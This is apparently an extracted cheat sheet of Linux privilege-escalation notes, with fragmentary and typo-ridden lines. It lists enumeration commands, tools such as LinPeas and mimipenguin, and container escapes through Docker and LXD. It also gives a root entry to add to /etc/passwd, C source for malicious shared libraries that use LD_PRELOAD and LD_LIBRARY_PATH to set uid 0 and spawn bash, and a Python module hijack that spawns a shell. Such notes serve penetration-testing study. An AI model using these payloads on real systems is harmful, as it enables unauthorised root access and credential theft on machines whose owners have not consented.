Linux Privilege Escalation
Linux Privilege Escalation
Enumeration
Manual
Enumerate Kernel version
uname -a
Eumerate Services
netstat -anlp
netstat -ano
Enumerate shells
cat /etc/shells
Enumerate Backups
Enumerate DBs
find / -name '.db' -o -name '.sqlite' -o -name '*.sqlite3' 2>/dev/null
GTFOBins
GTFOBins is a curated list of Unix binaries that can be
used to bypass local security restrictions in
misconfigured systems. The project collects legitimate
https://gtfobins.github.io/
Automated
LinEnum
LinPeas
./linpeas.sh -e
https://github.com/luke-goddard/enumy
https://github.com/sleventyeleven/linuxprivchecker
Exploitation
Kernel Version Exploits
Search For Exploit For Kernel Version
./linux-exploit-suggester.sh -k 5.1.0
searhsploit
github search
searhsploit
github search
Weak permession
can read /etc/shadow
hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/
can edit executables in with sudo rights located in $PATH or in any DIR
MySQL : phpconfig
Process Dump
https://github.com/huntergregal/mimipenguin
./mimipenguin.sh
Locate Process
Using gcore
Using procdump
/dev/mem Search
/dev/mem provides access to the system's physical memory, not the virtual
memory
Docker PE Exploitation
Through Docker We Can mount host system files to an image and run
image and Edit its files [image files+host system files]
Edit this mounted files [/etc/shadow] because You are root in Linux
Container
nano /etc/passwd
LXD PE Exploitation
You Will Build an Machine in attacker machine & Transfare it lxd-Alpine-
Builder github
use any file Transfare Technique To Transfare this file to Vectim machine
In Vectim machine run this to mount host files in LXD alpine Container t
lxd init
#hit enter For all
lxc list
Now You are root in this container [You Can Edit|show any file like etc
shadow mounted from host ]
cd /mnt/hacked
cat /etc/shadow
Binaries Exploitation
This Techniques Applied on
SUID-SGID Binaries
Executables can be
fil.sh
file.AppImage
1- PATH manipulation
Technique taht you add a new path that system search for executables in it
2- Object Injection
first What is .so Files
first Find shared Object for the binary , locate its path
void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash
}
compile shell_spawner.c to be .so file with the same name & path for
targeted shared object
Check Line
Defaults env_reset
#this means reset the environment variables values before executing any
command as sudo
Defaults env_keep+=LD_PRRELOAD
#this means dont reset the environment variable LD_PRELOAD value
libraries [Code Blocks that Developer use its functions to ease coding]
files with .so extension called (loaded in ram) when execute a C combiled
Program need them
Making Malicious_lib.so
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
cd /tmp
gcc -fPIC -shared -o pe.so pe.c -nostartfiles
sudo LD_PRELOAD=Malicious_lib.so <COMMAND> #Use any comm
Check Line
#this means reset the environment variables values before executing any
command as sudo
Defaults env_keep+=LD_LIBRARY_PATH
#this means dont reset the environment variable LD_LIBRARY_PATH value
libraries [Code Blocks that Developer use its functions to ease coding]
files with .so extension called (loaded in ram) when execute a C combiled
Program need them
ldd /command_path
#include <stdio.h>
#include <stdlib.h>
//lib.c file
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}
cd /newpath
gcc -o /tmp/lib.so -shared -fPIC /newpath/lib.c
spawn a shell
as explaining on image
we will go to the file directory and Know modules called by python code
cd /home/sofs/script/
cat vip.py
#vip.py
import os
import zipfile
if __name__ == '__main__':
zipf = zipfile.ZipFile('/var/backups/website.zip', '
zipdir('/var/www/html', zipf)
zipf.close()
we will make new file with same name of called modules in the same
Directory
nano zipfile.py
import pty
pty.spawn("/bin/sh")
searchsploit
GitFoBins
after Reading executable with strings - cat You Found that called
another executble with Full Path
When in debugging mode, Bash uses the environment variable PS4 to display an
extra prompt for debugging statements.
/tmp/rootshell -p
What is root_squash
By Default NFS has a method of writable files in shares on local machine
a files with a permession as a remote user have on remote machine
screen -ls
tmux ls
Hijacking